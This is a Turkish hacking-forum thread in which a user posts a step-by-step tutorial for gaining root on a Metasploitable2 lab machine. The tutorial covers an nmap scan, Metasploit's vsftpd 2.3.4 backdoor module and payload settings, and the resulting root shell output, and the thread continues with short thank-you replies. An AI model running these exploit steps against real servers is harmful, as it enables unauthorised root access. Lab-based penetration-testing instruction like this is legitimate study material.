İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

FTP Protokolü Sızma Testi / Pentester

25-01-2017 15:59
#1
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.169
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Herkese merhaba,

Bu konuda, FTP protokolü üzerinde ki "vsftpd 2.3.4" uygulamasını exploit ederek hedef sistemde root yetkisine çıkmayı göstereceğim.

Sızma Testi senaryosunu gerçekleştirirken, laborotatuvar ortamı olarak, "métasploitable2-Linux" sistemini kullandım.

Artık anlatıma geçelim.

Öncelikle hedef sunucumuzda bir nmap ile port taraması yaparak keşif çalışmamızı yapalım.

"nmap -sV 192.168.127.130" hedef sunucumuzun İP adresidir.





Tarama sonucunda gördüğünüz gibi, FTP protokolü üzerinde, "vsftpd 2.3.4" uygulaması çalışmakta.

Biz de bunu kullanarak hedef sunucuya sızabiliriz.

Açalım bakalım, métasploit framework’ ümüzü

"msfconsole" diyerek açıyoruz.




search vsftpd" komutunu girerek explotimizi aradık.

"use exploit/unix/ftp/vsftpd_234_backdoor" exploitimize giriyoruz.

"show payloads" komutu ile exploite uygun payloadları arıyoruz ve "cmd/unix/interact" payloadını seçiyoruz.




ardından, "show options" komutunu girerek, genel ayarları yapıyoruz.

"set RHOST 192.168.127.130" ve "set RPORT 21" bilgilerini girerek exploiti çalıştırıyoruz.




exploit sonucunda, hedef sistemde root yetkisi kazanmış olduk.

UID: uid=0(root) gid=0(root)

görüldüğü üzere, "command shell session 1 opened" 1 shell oturumu açıldı. Artık linux komutlarıı çalıştırabiliriz. Gerisi
size kalmış.

"whoami" komutunu girdim, "root" çıktısını aldım. Bu demek oluyorki sen root kullanıcısısın artık.

"uname -a" komutu ile hedef sistemin kernel sürümünü öğrendim.

"ls" komutu ile bulunduğum dizinin dosyalarını listeledim. Ve çok şey yapabiliriz.

Anlatım bu kadar.

Bu eğitim konumunda sonuna geldim, okuduğunuz için teşekkür ederim
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
Mustafa Akkaya, MyGf, dump3cz, Yusif Aze Teşekkür etti.

25-01-2017 16:05
#2
Mustafa Akkaya - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2015
Nereden:
Ceres
Mesajlar:
1.481
Teşekkür (Etti):
120
Teşekkür (Aldı):
122
Konular:
31
Ticaret:
(0) %
Çok yaralı bir konu teşekkürler
Pentester Teşekkür etti.
25-01-2017 23:04
#3
Nistagmus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Nereden:
Dünya
Mesajlar:
559
Teşekkür (Etti):
47
Teşekkür (Aldı):
87
Konular:
158
Ticaret:
(0) %
allah senden razı olsun ne zamandır arıyorum peki başka portlardan sızma şekilleri aynımı teşekkürler
Kullanıcı İmzası
N-İ-S-T-A-G-M-U-S

Bir Millet Zenginliğiyle Değil Ahlak Değeri İle Ölçülür.
-M. Kemal ATATÜRK
25-01-2017 23:05
#4
RufSkynoN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2016
Nereden:
Vatan'
Mesajlar:
2.176
Teşekkür (Etti):
618
Teşekkür (Aldı):
432
Konular:
226
Ticaret:
(0) %
Çok sağol linux boşu boşuna duruyordu
Kullanıcı İmzası
Eski Dergici
25-01-2017 23:06
#5
dump3cz - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2016
Nereden:
Kocaeli
Mesajlar:
2.391
Teşekkür (Etti):
814
Teşekkür (Aldı):
407
Konular:
159
Ticaret:
(0) %
Çok güzel anlatım ellerine sağlık
26-01-2017 13:27
#6
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.169
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Alıntı:
repymaz9´isimli üyeden Alıntı Mesajı göster
allah senden razı olsun ne zamandır arıyorum peki başka portlardan sızma şekilleri aynımı teşekkürler
Mantık aynıdır
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı